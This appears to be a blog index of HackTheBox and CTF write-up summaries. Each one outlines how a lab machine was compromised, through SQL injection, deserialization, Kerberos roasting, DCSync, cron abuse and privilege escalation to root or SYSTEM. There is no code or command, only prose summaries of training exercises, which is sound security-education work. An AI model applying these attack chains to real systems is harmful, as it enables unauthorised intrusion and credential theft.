Rooting Joker had three steps. The first was using TFTP to get the Squid Proxy config and creds that allowed access to a webserver listening on localhost that provided a Python console. To turn that into a shell, I’ll have to enumerate the firewall and find that I can use UDP. I’ll show two ways to abuse a sudo rule to make the second step. I can take advantage of the sudoedit_follow flag, or just abuse the wildcards in the rule. The final pivot to root exploits a cron running creating tar archives, and I’ll show three different ways to abuse it.
Tunneling with Chisel and SSFhackthebox tunnel chisel ssf htb-redd.
HTB: Fattyhackthebox htb-fatty ctf java nmap ftp update-alternatives jar wireshark procyon javac directory-traversal filter reverse-engineering tar scp cron sqli injection deserialization ysoserial pspy htb-arkham
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get the client to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL injection that allows me to log in as an admin user, which gives me access to additional functionality. One of the new functions uses serialized objects, which I can exploit using a deserialization attack to get a shell in the container running the server. Escalation to root attacks a recurring process that is using SCP to copy an archive of log files off the container to the host. By guessing that the log files are extracted from the archive, I’m able to create a malicious archive that allows me over the course of two SCPs to overwrite the root authorized_keys file and then SSH into Fatty as root.
Jar Files: Analysis and Modificationsjava reverse-engineering decompile jar recompile procyon javac. Updated 8 Aug 2020: Now that Fatty from HackTheBox has retired, I’ve updated this post to reflect some examples.
HTB Pwnbox Reviewctf hackthebox pwnbox parrot vm ssh scp tmux api
I was recently talking with some of the folks over at HackTheBox, and they asked my thoughts about Pwnbox. My answer was that I’d never really used it, but that I would give it a look and provide feedback. The system is actually quite feature packed. It is only available to VIP members, but if you are VIP, it’s worth spending a few minutes setting up the customizations. That way, if you should find yourself in need of an attack VM, you have it, and you might even just switch there.
HTB: Oouchhtb-oouch hackthebox ctf oauth nmap ftp vsftpd vhosts csrf gobuster api ssh container docker dbus iptables command-injection injection uwsgi waf cron htb-lame htb-secnotes
The first half of Oouch built all around OAuth, a technology that is commonplace on the internet today, and yet I didn’t understand well coming into the challenge. This box forced me to gain an understanding, and writing this post cemented that even further. To get user, I’ll exploit an insecure implementation of OAuth via a CSRF twice. The first time to get access to qtc’s account on the consumer application, and then to get access to qtc’s data on the authorization server, which includes a private SSH key. With a shell, I’ll drop into the consumer application container and look at how the site was blocking XSS attacks, which includes some messaging over DBus leading to iptables blocks. I’ll pivot to the www-data user via a uWSGI exploit and then use command injection to get execution as root. In Beyond Root, I’ll look at the command injection in the root DBus server code.
HTB: Lazyhackthebox htb-lazy ctf nmap ubuntu php gobuster cookies python crypto burp burp-repeater padding-oracle padbuster firefox bit-flip ssh suid path-hijack hashcat penglab gdb ltrace cyberchef des peda debug
Lazy was a really solid old HackTheBox machine. It’s a medium difficulty box that requires identifying a unique and interesting cookie value and messing with it to get access to the admin account. I’ll show both a padding oracle attack and a bit-flipping attack that each allow me to change the encrypted data to grant admin access. That access provides an SSH key and a shell. To privesc, there’s a SetUID binary that is vulnerable to a path hijack attack. In Beyond Root, I’ll poke at the PHP source for the site, identify a third way to get logged in as admin, and do a bit of debugging on the SetUID binary.
HTB: Cascadehackthebox htb-cascade ctf nmap rpc ldap ldapsearch smb tightvnc vncpwd evil-winrm crackmapexec sqlite dnspy debug ad-recycle oscp-plus
Cascade was an interesting Windows all about recovering credentials from Windows enumeration. I’ll find credentials for an account in LDAP results, and use that to gain SMB access, where I find a TightVNC config with a different users password. From there, I get a shell and access to a SQLite database and a program that reads and decrypts a password from it. That password allows access to an account that is a member of the AD Recycle group, which I can use to find a deleted temporary admin account with a password, which still works for the main administrator accoun, providing a shell.
HTB: Shrekctf hackthebox htb-shrek nmap php gobuster audacity steganography crypto ssh ecc seccure python chown wildcard ghidra pspy passwd extended-attributes xattr lsattr cron suid
Shrek is another 2018 HackTheBox machine that is more a string of challenges as opposed to a box. I’ll find an uploads page in the website that doesn’t work, but then also find a bunch of malware (or malware-ish) files in the uploads directory. One of them contains a comment about a secret directory, which I’ll check to find an MP3 file. Credentials for the FTP server are hidden in a chunk of the file at the end. On the FTP server, there’s an encrypted SSH key, and a bunch of files full of base64-encoded data. Two have a passphrase and an encrypted blob, which I’ll decrypt to get the SSH key password, and use to get a shell. To privesc, I’ll find a process running chmod with a wildcard, and exploit that to change the ownership of the passwd file to my user, so I can edit it and get a root shell. In Beyond Root, I’ll examine the text file in the directory and why it doesn’t get it changed ownership, look at the automation and find a curious part I wasn’t expecting, and show an alternative root based on that automation (which may be the intended path).
HTB: Saunactf hackthebox htb-sauna nmap windows ldapsearch ldap kerberos seclists as-rep-roast getnpusers hashcat evil-winrm smbserver winpeas autologon-credentials bloodhound sharphound neo4j dcsync secretsdump mimikatz wmiexec psexec oscp-plus
Sauna was a neat chance to play with Windows Active Directory concepts packaged into an easy difficulty box. I’ll start by using a Kerberoast brute force on usernames to identify a handful of users, and then find that one of them has the flag set to allow me to grab their hash without authenticating to the domain. I’ll AS-REP Roast to get the hash, crack it, and get a shell. I’ll find the next users credentials in the AutoLogon registry key. BloodHound will show that user has privileges the allow it to perform a DC Sync attack, which provides all the domain hashes, including the administrators, which I’ll use to get a shell.
HTB: Tentenhackthebox htb-tenten ctf nmap wordpress wpscan gobuster wp-job-manager cve-2015-6668 python steganography steghide ssh john sudo mysql
Tenten had a lot of the much more CTF-like aspects that were more prevalent in the original HTB machine, like a uploaded hacker image file from which I will extract an SSH private key from it using steganography. I learned a really interesting lesson about wpscan and how to feed it an API key, and got to play with a busted WordPress plugin. In Beyond Root I’ll poke a bit at the WordPress database and see what was leaking via the plugin exploit.
HTB: Bookhackthebox ctf htb-book nmap ubuntu gobuster sql-truncation sql xss lfi pspy logrotate logrotten crontab oscp-plus
Getting a foothold on Book involved identifying and exploiting a few vulnerabilities in a website for a library. First there’s a SQL truncation attack against the login form to gain access as the admin account. Then I’ll use a cross-site scripting (XSS) attack against a PDF export to get file read from the local system. This is interesting because typically I think of XSS as something that I present to another user, but in this case, it’s the PDF generate software. I’ll use this to find a private SSH key and get a shell on the system. To get root, I’ll exploit a regular logrotate cron using the logrotten exploit, which is a timing against against how logrotate worked. In Beyond Root, I’ll look at the various crons on the box and how they made it work and cleaned up.
HTB: Bankhtb-bank hackthebox ctf nmap vhosts dns dig zone-transfer wfuzz gobuster burp regex burp-repeater filter suid php passwd
Bank was an pretty straight forward box, though two of the major steps had unintended alternative methods. I’ll enumerate DNS to find a hostname, and use that to access a bank website. I can either find creds in a directory of data, or bypass creds all together by looking at the data in the HTTP 302 redirects. From there, I’ll upload a PHP webshell, bypassing filters, and get a shell. To get root, I can find a backdoor SUID copy of dash left by the administrator, or exploit write privileges in /etc/passwd. In Beyond Root, I’ll look at the coding mistake in the 302 redirects, and show how I determined the SUID binary was dash.
HTB: ForwardSlashhtb-forwardslash ctf hackthebox ubuntu nmap php vhosts wfuzz gobuster burp burp-repeater rfi lfi xxe credentials ssh sudo suid python luks crypto
ForwardSlash starts with enumeration of a hacked website to identify and exploit at least one of two LFI vulnerabilities (directly using filters to base64 encode or using XXE) to leak PHP source which includes a password which can be used to get a shell. From there, I’ll exploit a severely non-functional “backup” program to get file read as the other user. With this, I’ll find a backup of the website, and find different credentials in one of the pages, which I can use for a shell as the second user. To root, I’ll break a homespun encryption algorithm to load an encrypted disk image which contains root’s private SSH key. In Beyond Root, I’ll dig into the website source to understand a couple surprising things I found while enumerating.
HTB: Blockyhackthebox ctf htb-blocky nmap wordpress java jar decompile jd-gui phpmyadmin wpscan ssh sudo oswe-like oscp-like
Blocky really was an easy box, but did require some discipline when enumerating. It would be easy to miss the /plugins path that hosts two Java Jar files. From one of those files, I’ll find creds, which as reused by a user on the box, allowing me to get SSH access. To escalate to root, the user is allowed to run any command with sudo and password, which I’ll use to sudo su returning a session as root.
HTB: PlayerTwoctf htb-playertwo hackthebox nmap vhosts gobuster wfuzz twirp proto3 api totp signing binwalk hexedit pspy php linux chisel mqtt paho python ssh exploit htb-rope heap tcache ldd patchelf ghidra checksec gdb pwntools type-juggling pwngdb htb-ellingson
PlayerTwo was just a monster of a box. Enumeration across three virtual hosts reveals a Twirp API where I can leak some credentials. Another API can be enumerated to find backup codes for for the 2FA for the login. With creds and backup codes, I can log into the site, which has a firmware upload section. The example firmware is signed, but only the first roughly eight thousand bytes. I’ll find a way to modify the arguments to a call to system to get execution and a shell. With a shell, I see a MQTT message queue on localhost, and connecting to it, I’ll find a private SSH key being sent, which I can use to get a shell as the next user. Finally, to get to root, I’ll do a heap exploit against a root SUID binary to get a shell. In a Beyond Root section that could be its own blog post, I’ll dig into a few unintended ways to skips parts of the intended path, and dig deeper on others.
HTB: Popcornhtb-popcorn hackthebox ctf nmap ubuntu karmic gobuster torrent-hoster filter webshell php upload cve-2010-0832 arbitrary-write passwd dirtycow ssh oswe-like oscp-like htb-nineveh
Popcorn was a medium box that, while not on TJ Null’s list, felt very OSCP-like to me. Some enumeration will lead to a torrent hosting system, where I can upload, and, bypassing filters, get a PHP webshell to run. From there, I will exploit CVE-2010-0832, a vulnerability in the linux authentication system (PAM) where I can get it to make my current user the owner of any file on the system. There’s a slick exploit script, but I’ll show manually exploiting it as well. I’ll quickly also show DirtyCow since it does work here.
HTB: ServMonhtb-servmon hackthebox ctf nmap windows ftp nvms-1000 gobuster wfuzz searchsploit directory-traversal lfi ssh crackmapexec tunnel exploit-db nsclient++ oscp-like
ServMon was an easy Windows box that required two exploits. There’s a hint in the anonymous FTP as to the location of a list of passwords. I can use a directory traversal bug in a NVMS 1000 web instance that will allow me to leak those passwords, and use one of them over SSH to get a shell. Then I can get the local config for the NSClient++ web instance running on TCP 8443, and use those credentials plus another exploit to get a SYSTEM shell.
HTB Endgame: XENendgame ctf hackthebox htb-xen nmap iis citrix xenapp smtp smtp-user-enum phishing swaks escape alwaysinstallelevated powerup uac-bypass msfvenom metasploit tunnel kerberoast getuserspns hashcat powerview crackmapexec password-spray ppk puttygen proxychains ssh kwprocessor keyboard-walks netscaler tcpdump packet-capture scp ssh wireshark ldap bloodhound sharphound xfreerdp winrm evil-winrm sebackupprivilege ntds diskshadow secretsdump wmiexec copy-filesebackupprivilege active-directory
Endgame XEN is all about owning a small network behind a Citrix virtual desktop environment. I’ll phish creds for the Citrix instance from users in the sales department, and then use them to get a foothold. I’ll break out of the restrictions in that environment, and then get administrator access. From there I’ll pivot into the domain, finding a Kerberoastable user and breaking the hash to get access to an SMB share with an encrypted SSH key. I’ll break that, and get access to the NetScaler device, where I’ll capture network traffic to find service creds in LDAP traffic. I’ll spray those creds against the domain to find they also work for a backup service, which I’ll use to access the DC, and to exfil the Active Directory database, where I can find the domain administrator hash.
HTB: Monteverdehtb-monteverde hackthebox ctf nmap windows active-directory smb smbclient smbmap rpc rpcclient crackmapexec password-spray credentials azure-active-directory evil-winrm azure-connect powershell sqlcmd mssql oscp-plus
For the third week in a row, a Windows box on the easier side of the spectrum with no web server retires. Monteverde was focused on Azure Active Directory. First I’ll look at RPC to get a list of users, and then check to see if any used their username as their password. With creds for SABatchJobs, I’ll gain access to SMB to find an XML config file with a password for one of the users on the box who happens to have WinRM permissions. From there, I can abuse the Azure active directory database to leak the administrator password. In Beyond Root, I’ll look deeper into two versions of the PowerShell script I used to leak the creds, and how they work or don’t work.
HTB Endgame: P.O.O.endgame ctf hackthebox htb-poo nmap iis windows gobuster ds-store iis-shortname wfuzz mssql mssqlclient mssql-linked-servers xp-cmdshell mssql-triggers sp_execute_external_script web-config ipv6 winrm sharphound bloodhound kerberoast invoke-kerberoast hashcat powerview juicypotato active-directory
Endgame Professional Offensive Operations (P.O.O.) was the first Endgame lab released by HTB. Endgame labs require at least Guru status to attempt (though now that P.O.O. is retired, it is available to all VIP). The lab contains two Windows hosts, and I’m given a single IP that represents the public facing part of the network. To collect all five flags, I’ll take advantage of DS_STORE files and Windows short filenames to get creds for the MSSQL instance, abuse trust within MSSQL to escalate my access to allow for code execution. Basic xp_cmdshell runs as a user without much access, but Python within MSSQL runs as a more privileged user, allowing me access to a config file with the administrator credentials. I’ll observe that WinRM is not blocked on IPv6, and get a shell. To pivot to the DC, I’ll run SharpHound and see that a kerberoastable user has Generic All on the Domain Admins group, get the hash, break it, and add that user to DA.
HTB: Nesthtb-nest ctf hackthebox nmap smb smbmap smbclient crypto vb visual-studio dnspy dotnetfiddle crackmapexec alternative-data-streams psexec oscp-plus htb-hackback htb-dropzone htb-bighead
Next was unique in that it was all about continually increasing SMB access, with a little bit of easy .NET RE thrown in. I probably would rate the box medium instead of easy, because of the RE, but that’s nitpicking. I’ll start with unauthenticated access to a share, and find a password for tempuser. With that access, I’ll find an encrypted password for C.Smith. I’ll also use a Notepad++ config to find a new directory I can access (inside one I can’t), which reveals a Visual Basic Visual Studio project that includes the code to decrypt the password. With access as C.Smith, I can find the debug password for a custom application listening on 4386, and use that to leak another encrypted password. This time I’ll debug the binary to read the decrpyted administrator password from memory, and use it to get a shell as SYSTEM with PSExec. When this box was first released, there was an error where the first user creds could successfully PSExec. I wrote a post on that back in January, but I’ve linked that post to this one on the left. In Beyond Root, I’ll take a quick look at why netcat can’t connect to the custom service on 4386, but telnet can.
Debugging CME, PSexec on HTB: Resolutecrackmapexec smb hackthebox ctf htb-resolute windows scmanager sddl dacl psexec github source-code metasploit wireshark smb cyberchef scdbg htb-nest
When I ran CrackMapExec with ryan’s creds against Resolute, it returned Pwn3d!, which is weird, as none of the standard PSExec exploits I attempted worked. Beyond that, ryan wasn’t an administrator, and didn’t have any writable shares. I’ll explore the CME code to see why it returned Pwn3d!, look at the requirements for a standard PSExec, and then debug the Metasploit exploit that does go directly to SYSTEM with ryan’s creds.
HTB: Resolutehtb-resolute ctf hackthebox nmap smb smbmap smbclient rpcclient rpc password-spray crackmapexec evil-winrm pstranscript net-use dnscmd msfvenom smbserver lolbas winrm htb-forest htb-hackback
It’s always interesting when the initial nmap scan shows no web ports as was the case in Resolute. The attack starts with enumeration of user accounts using Windows RPC, including a list of users and a default password in a comment. That password works for one of the users over WinRM. From there I find the next users creds in a PowerShell transcript file. That user is in the DnsAdmins group, which allows for an attack against dnscmd to get SYSTEM. In beyond root, I’ll identify the tool the box creator used to connect to the box and generate the PowerShell transcript.
HTB: Grandpahackthebox ctf htb-grandpa windows-2003 iis nmap gobuster webdav davtest searchsploit msfvenom cve-2017-7269 explodingcan metasploit icacls systeminfo windows-exploit-suggester seimpersonate churrasco oscp-like htb-granny
Grandpa was one of the really early HTB machines. It’s the kind of box that wouldn’t show up in HTB today, and frankly, isn’t as fun as modern targets. Still, it’s a great proxy for the kind of things that you’ll see in OSCP, and does teach some valuable lessons, especially if you try to work without Metasploit. With Metasploit, this box can probably be solved in a few minutes. Typically, the value in avoiding Metasploit comes from being able to really understand the exploits and what’s going on. In this case, it’s more about the struggle of moving files, finding binarys, etc.
HTB: Ropehackthebox ctf htb-rope directory-traversal format-string pwntools bruteforce pwn python ida aslr pie sudo library tunnel canary rop
Rope was all about binary exploitation. For initial access, I’ll use a directory traversal bug in the custom webserver to get a copy of that webserver as well as it’s memory space. From there, I can use a format string vulnerability to get a shell. To get to the next user, I’ll take advantage of an unsafe library load in a program that the current user can run with sudo. Finally, for root, I’ll exploit a locally running piece of software that requires brute forcing the canary, RBP, and return addresses to allows for an overflow and defeat PIE, and then doing a ROP libc leak to get past ASLR, all to send another ROP which provides a shell.
HTB: Arctichtb-arctic ctf hackthebox nmap coldfusion javascript searchsploit jsp upload metasploit directory-traversal crackstation windows-exploit-suggester ms10-095 oscp-like
Arctic would have been much more interesting if not for the 30-second lag on each HTTP request. Still, there’s enough of an interface for me to find a ColdFusion webserver. There are two different paths to getting a shell, either an unauthenticated file upload, or leaking the login hash, cracking or using it to log in, and then uploading a shell jsp. From there, I’ll use MS10-059 to get a root shell.
HTB: Patentsctf htb-patents hackthebox nmap upload libreoffice office xxe gobuster docx custom-folder sans-holiday-hack dtd log-poisoning directory-traversal lfi webshell docker pspy password-reuse git reverse-engineering bof exploit python pwntools ghidra pwn onegadget rop libc libc-database df mount cyberchef php payloadsallthethings
Patents was a really tough box, that probably should have been rated insane. I’ll find two listening services, a webserver and a custom service. I’ll exploit XXE in Libre Office that’s being used to convert docx files to PDFs to leak a configuration file, which uncovers another section of the site. In that section, there is a directory traversal vulnerability that allows me to use log poisoning to get execution and a shell in the web docker container. To get root in that container, I’ll find a password in the process list. As root, I get access to an application that’s communicating with the custom service on the host machine. I’ll also find a Git repo with the server binary, which I can reverse and find an exploit in, resulting in a shell as root on the host machine. In Beyond Root, I’ll look at chaining PHP filters to exfil larger data over XXE.
ngrok FTWctf ngrok tunnel.
HTB: Obscurityhtb-obscurity ctf hackthebox nmap python gobuster dirsearch wfuzz python-injection command-injection code-analysis crypto credentials race-condition injection lxd lxc arbitrary-write python-path htb-mischief
Obscuirt was a medium box that centered on finding bugs in Python implementions of things - a webserver, an encryption scheme, and an SSH client. I’ll start by locating the source for the custom Python webserver, and injecting into it to get code execution and a shell. I’ll pivot to the next user abusing a poor custom cipher to decrypt a password. To get root, I’ll show four different ways. Two involve an SSH-like script that I can abuse both via a race condition to leak the system hashes and via injection to run a command as root instead of the authed user. The other two were patches after the box was released, but I’ll show them, exploiting the Python path, and exploiting the lxd group.
COVID-19 CTF: CovidScammersctf wireshark reverse-engineering ltrace crypto python pwntools fuzz bof pattern-create shellcode dup2
Last Friday I competed with the Neutrino Cannon CTF team in the COVID-19 CTF created by Threat Simulations and RunCode as a part of DERPCON 2020. I focused much of my efforts on a section named CovidScammers. It was a really interesting challenge that encompassed forensics, reverseing, programming, fuzzing, and exploitation. I managed to get a shell on the C2 server just as I had to sign off for the day, so I didn’t complete the next steps that unlocked after that. Still, I really enjoyed the challenge and wanted to show the steps up to that point.
HTB: OpenAdminhtb-openadmin hackthebox ctf nmap gobuster opennetadmin searchsploit password-reuse webshell ssh john sudo gtfobins oscp-like
OpenAdmin provided a straight forward easy box. There’s some enumeration to find an instance of OpenNetAdmin, which has a remote coded execution exploit that I’ll use to get a shell as www-data. The database credentials are reused by one of the users. Next I’ll pivot to the second user via an internal website which I can either get code execution on or bypass the login to get an SSH key. Finally, for root, there’s a sudo on nano that allows me to get a root shell using GTFObins.
HTB: SolidStatehackthebox ctf htb-solidstate nmap james pop3 smtp bash-completion ssh rbash credentials directory-traversal cron pspy oscp-like
The biggest trick with SolidState was not focusing on the website but rather moving to a vulnerable James mail client. In fact, if I take advantage of a restrictred shell escape, I don’t even need to exploit James, but rather just use the admin interface with default creds to gain access to the various mailboxes, find SSH creds, escape rbash, and continue from there. But I will also show how to exploit James using a directory traversal vulnerability to write a bash completion script and then trigger that with a SSH login. For root, there’s a cron running an writable python script, which I can add a reverse shell to. In Beyond Root, I’ll look at payloads for the James exploit, both exploring what didn’t work, and improving the OPSEC.
HTB: Controlctf hackthebox htb-control nmap mysql http-header wfuzz sqli injection mysql-file-write hashcat powershell-run-as winpeas registry-win service windows-service powershell oscp-plus htb-nest
Control was a bit painful for someone not comfortable looking deep at Windows objects and permissions. It starts off simply enough, with a website where I’ll have to forge an HTTP header to get into the admin section, and then identify an SQL injection to write a webshell and dump user hashes. I can use the webshell to get a shell, and then one of the cracked hashes to pivot to a different user. From there, I’ll find that users can write the registry keys associated with Services. I’ll construct some PowerShell to find potential services that I can restart, and then modify them to run NetCat to return a shell.
HTB: Ninevehhtb-nineveh hackthebox ctf nmap vhosts gobuster phpinfo bruteforce phpliteadmin sql sqlite searchsploit hydra directory-traversal lfi webshell strings binwalk tar ssh port-knocking knockd chkrootkit pspy oscp-like
There were several parts about Nineveh that don’t fit with what I expect in a modern HTB machine - steg, brute forcing passwords, and port knocking. Still, there were some really neat attacks. I’ll show two ways to get a shell, by writing a webshell via phpLiteAdmin, and by abusing PHPinfo. From there I’ll use my shell to read the knockd config and port knock to open SSH and gain access using the key pair I obtained from the steg image. To get root, I’ll exploit chkroot, which is running on a cron.
HTB: Mangohackthebox htb-mango ctf nmap certificate subdomains wfuzz nosql mongo injection nosql-injection python ssh password-reuse jjs gtfobins sudoers oscp-plus oswe-like
Mango’s focus was exploiting a NoSQL document database to bypass an authorization page and to leak database information. Once I had the users and passwords from the database, password reuse allowed me to SSH as one of the users, and then su to the other. From there, I’ll take advantage of a SUID binary associated with Java, jjs. I’ll show both file read and get a shell by writing a public SSH key into root’s authorized keys file.
HTB: Cronoshtb-cronos ctf hackthebox nmap dns nslookup zone-transfer dig gobuster vhosts subdomain laravel searchsploit sqli injection command-injection burp linpeas cron php mysql cve-2018-15133 metasploit oscp-like
Cronos didn’t provide anything too challenging, but did present a good intro to many useful concepts. I’ll enumerate DNS to get the admin subdomain, and then bypass a login form using SQL injection to find another form where I could use command injections to get code execution and a shell. For privesc, I’ll take advantage of a root cron job which executes a file I have write privileges on, allowing me to modify it to get a reverse shell. In Beyond Root, I’ll look at the website and check in on how I was able to do both the SQLi and the command injection, as well as fail to exploit the machine with a Laravel PHP framework deserialization bug, and determine why.
HTB: Traverxechtb-traverxec hackthebox ctf nmap nostromo searchsploit metasploit htpasswd hashcat ssh john gtfobins journalctrl oscp-like
Traverxec was a relatively easy box that involved enumerating and exploiting a less popular webserver, Nostromo. I’ll take advantage of a RCE vulnerability to get a shell on the host. I could only find a Metasploit script, but it was a simple HTTP request I could recreate with curl. Then I’ll pivot into the users private files based on his use of a web home directory on the server. To get root, I’ll exploit sudo used with journalctrl.
HTB: Sniper Beyond Roothackthebox ctf htb-sniper cron scheduled-task persistence powershell startup magic htb-secnotes htb-re
In Sniper, the administrator user is running CHM files that are dropped into c:\docs, and this is the path from the chris user to administrator. I was asked on Twitter how the CHM was executed, so I went back to take a look.
HTB: More Lamehackthebox htb-lame ctf nmap distcc searchsploit cve-2004-2687 cve-2008-0166 ssh rsa suid gtfobins wireshark python oscp-like htb-irked
After I put out a Lame write-up yesterday, it was pointed out that I skipped an access path entirely - distcc. Yet another vulnerable service on this box, which, unlike the Samba exploit, provides a shell as a user, providing the opportunity to look for PrivEsc paths. This box is so old, I’m sure there are a ton of kernel exploits available. I’ll skip those for now focusing on
twothree paths to root - finding a weak public SSH key, using SUID nmap, and backdoored UnrealIRCd.
HTB: Lamehackthebox htb-lame ctf nmap ftp vsftpd samba searchsploit exploit metasploit oscp-like htb-lacasadepapel
Lame was the first box released on HTB (as far as I can tell), which was before I started playing. It’s a super easy box, easily knocked over with a Metasploit script directly to a root shell. Still, it has some very OSCP-like aspects to it, so I’ll show it with and without Metasploit, and analyze the exploits. It does throw one head-fake with a VSFTPd server that is a vulnerable version, but with the box configured to not allow remote exploitation. I’ll dig into VSFTPd in Beyond Root.
HTB: Registryhtb-registry hackthebox ctf nmap wfuzz subdomain gobuster zcat docker bolt-cms searchsploit api docker-fetch ssh credentials sqlite hashcat webshell firewall tunnel restic cron
Registry provided the chance to play with a private Docker registry that wasn’t protected by anything other than a weak set of credentials. I’ll move past that to get the container and the SSH key and password inside. From there, I’ll exploit an instance of Bolt CMS to pivot to the www-data user. As www-data, I can access the Restic backup agent as root, and exploit that to get both the root flag and a root ssh key.
Jar Files: Modification Cheat Sheetjava reverse-engineering decompile jar recompile. When the challenge ends, I’ll update with some narrative.
HTB: Sniperhackthebox ctf htb-sniper nmap commando gobuster lfi rfi wireshark samba log-poisoning powershell webshell powershell-run-as chm nishang oscp-plus
Sniper involved utilizing a relatively obvious file include vulnerability in a web page to get code execution and then a shell. The first privesc was a common credential reuse issue. The second involved poisoning a
.chmfile to get code execution as the administrator.
update-alternativeslinux update-alternatives nc java namei bash
Debian Linux (and its derivatives like Ubuntu and Kali) has a system called alternatives that’s designed to manage having different version of some software, or aliasing different commands to different versions within the system. Most of the time, this is managed by the package management system. When you run apt install x, it may do some of this behind the scenes for you. But there are times when it is really useful to know how to interact with this yourself. For example, I’m currently working on a challenge that requires using an older version of Java to interact with a file. I’ll use update-altneratives to install the new Java version, and then to change what version java, javac, jar, etc utilize.
HTB: Foresthackthebox ctf htb-forest nmap active-directory dig dns rpc rpcclient as-rep-roast hashcat winrm evil-winrm sharphound smbserver bloodhound dcsync aclpwn wireshark scheduled-task oscp-like htb-active htb-reel htb-sizzle
One of the neat things about HTB is that it exposes Windows concepts unlike any CTF I’d come across before it. Forest is a great example of that. It is a domain controller that allows me to enumerate users over RPC, attack Kerberos with AS-REP Roasting, and use Win-RM to get a shell. Then I can take advantage of the permissions and accesses of that user to get DCSycn capabilities, allowing me to dump hashes for the administrator user and get a shell as the admin. In Beyond Root, I’ll look at what DCSync looks like on the wire, and look at the automated task cleaning up permissions.
HTB: Postmanhackthebox htb-postman ctf nmap webmin redis ssh john credentials cve-2019-12840 metasploit oscp-like
Postman was a good mix of easy challenges providing a chance to play with Redis and exploit Webmin. I’ll gain initial access by using Redis to write an SSH public key into an authorized_keys file. Then I’ll pivot to Matt by cracking his encrypted SSH key and using the password. That same password provides access to the Webmin instance, which is running as root, and can be exploited to get a shell. In Beyond Root, I’ll look at a Metasploit Redis exploit and why it failed on this box.
HTB: Bankrobberctf htb-bankrobber hackthebox nmap mysql smb gobuster cookies xss csrf sqli injection bof ida chisel python pattern-create phantom-js reverse-engineering oscp-like htb-giddy htb-querier
BankRobber was neat because it required exploiting the same exploit twice. I’ll find a XSS vulnerability that I can use to leak the admin user’s cookie, giving me access to the admin section of the site. From there, I’ll use a SQL injection to leak the source for one of the PHP pages which shows it can provide code execution, but only accepts requests from localhost. I’ll use the same XSS vulnerability to get the admin to send that request from Bankrobber, returning a shell. To privesc to SYSTEM, I’ll find a binary running as SYSTEM and listening only on localhost. I’m not able to grab a copy of the binary as my current user, but I can create a tunnel and poke at it directly. First I’ll brute force a 4-digit pin, and then I’ll discover a simple buffer overflow that allows me to overwrite a string that is the path to an executable that’s later run. I can overwrite that myself to get a shell. In Beyond Root, I’ll look at how the XSS was automated and at the executable now that I have access.
HTB: Scavengerctf hackthebox htb-scavenger nmap whois sqli injection zone-transfer exim cve-2019-10149 vhosts wfuzz dirsearch wpscan mantisbt webshell ir python python-cmd mkfifo-shell forward-shell hydra rootkit ida iptables reverse-engineering htb-stratosphere
Scavenger required a ton of enumeration, and I was able to solve it without ever getting a typical shell. The box is all about enumerating the different sites on the box (and using an SQL injection in whois to get them all), and finding one is hacked and a webshell is left behind. The firewall rules make getting a reverse shell impossible, but I’ll use the RCE to enumerate the box (and build a stateful Python shell in the process, though it’s not necessary). Enumerating will turn up several usernames and passwords, which I’ll use for FTP access to get more creds, the user flag, and a copy of a rootkit that’s running on the box. A combination of finding the rootkit described on a webpage via Googling and reversing to see how it’s changed gives me the ability to trigger any session to root. In Beyond Root, I’ll look more in-depth at the SQLi in the whois server, examine the iptables rules that made getting a reverse shell impossible, and show how to use CVE-2019-10149 against the EXIM mail server to get execution as root as well.
HTB: Zettactf htb-zetta hackthebox nmap ftp-bounce rfc-2428 ipv6 rsync credentials ssh tudu syslog git postgres sqli
Zetta starts off different from the start, using FTP Bounce attacks to identify the IPv6 address of the box, and then finding RSync listening on IPv6 only. I’ll use limited RSync access to get the size of a user’s password, and then brute force it to get access to the roy home directory, where I can write my key to the authorized keys file to get SSH access. I’ll escalate to the postgres user with an SQL injection into Syslog, where the box author cleverly uses Git to show the config but not the most recent password. Finally, I’ll recover the password for root using some logic and the postgres user’s password. In Beyond Root, I’ll look at the authentication for the FTP server that allowed any 32 character user with the username as the password, dig into the RSync config, and look at the bits of the Syslog config that were hidden from me.
HTB: Jsonhackthebox htb-json ctf commando nmap deserialization dotnet javascript deobfuscation jsnice gobuster oauth ysoserial.net filezilla chisel ftp dnspy python des crypto juicypotato potato oswe-like htb-arkham
Json involved exploiting a .NET deserialization vulnerability to get initial access, and then going one of three ways to get root.txt. I’ll show each of the three ways I’m aware of to escalate: Connecting to the FileZilla Admin interface and changing the users password; reversing a custom application to understand how to decrypt a username and password, which can then be used over the same FTP interface; and JuicyPotato to get a SYSTEM shell. Since this is a Windows host, I’ll work it almost entirely from my Windows Commando VM.
HTB: REhackthebox ctf htb-re nmap vhosts jekyll smbclient smbmap libreoffice office ods macro invoke-obfuscation nishang zipslip winrar cron webshell ghidra xxe responder hashcat evil-winrm winrm chisel tunnel usosvc accesschk service service-hijack diaghub esf mimikatz hashes-org htb-ai htb-hackback htb-helpline
RE was a box I was really excited about, and I was crushed when the final privesc didn’t work on initial deployment. Still, it got patched, and two unintended paths came about as well, and everything turned out ok. I’ll approach this write-up how I expected people to solve it, and call out the alternative paths (and what mistakes on my part allowed them) as well. I’ll upload a malicious ods file to a malware sandbox where it is run as long as it is obfuscated. From there, I’ll abuse WinRar slip vulnerability to write a webshell. Now as IIS user, I can access a new folder where Ghidra project files can be dropped to exploit an XXE in Ghidra. There’s two unintended paths from IIS to SYSTEM using the UsoSvc and Zipslip and Diaghub, where then I have to get coby’s creds to read root.txt. I’ll show all of these, and look at some of the automation scripts (including what didn’t work on initial deployment) in Beyond Root.
Digging into PSExec with HTB Nesthackthebox ctf htb-nest psexec smb windows scmanager sddl dacl sacl ace icacls
“You have to have administrator to PSExec.” That’s what I’d always heard. Nest released on HTB yesterday, and on release, it had an unintended path where a low-priv user was able to PSExec, providing a shell as SYSTEM. This has now been patched, but I thought it was interesting to see what was configured that allowed this non-admin user to get a shell with PSExec. Given this is a live box, I won’t go into any of the details that still matter, saving that for a write-up in 20ish weeks or so.
HTB: AIhackthebox ctf htb-ai nmap gobuster text2speech flite sqli tomcat jdwp jdb jwdp-shellifier
AI was a really clever box themed after smart speakers like Echo and Google Home. I’ll find a web interface that accepts sound files, and use that to find SQL injection that I have to pass using words. Of course I’ll script the creation of the audio files, and use that to dump credentials from the database that I can use to access the server. For privesc, I’ll find an open Java Debug port on Tomcat running as root, and use that to get a shell.
HTB: Playerhackthebox ctf htb-player nmap vhosts ssh searchsploit wfuzz burp jwt codiad bfac ffmpeg lshell webshell deserialization php lfi escape
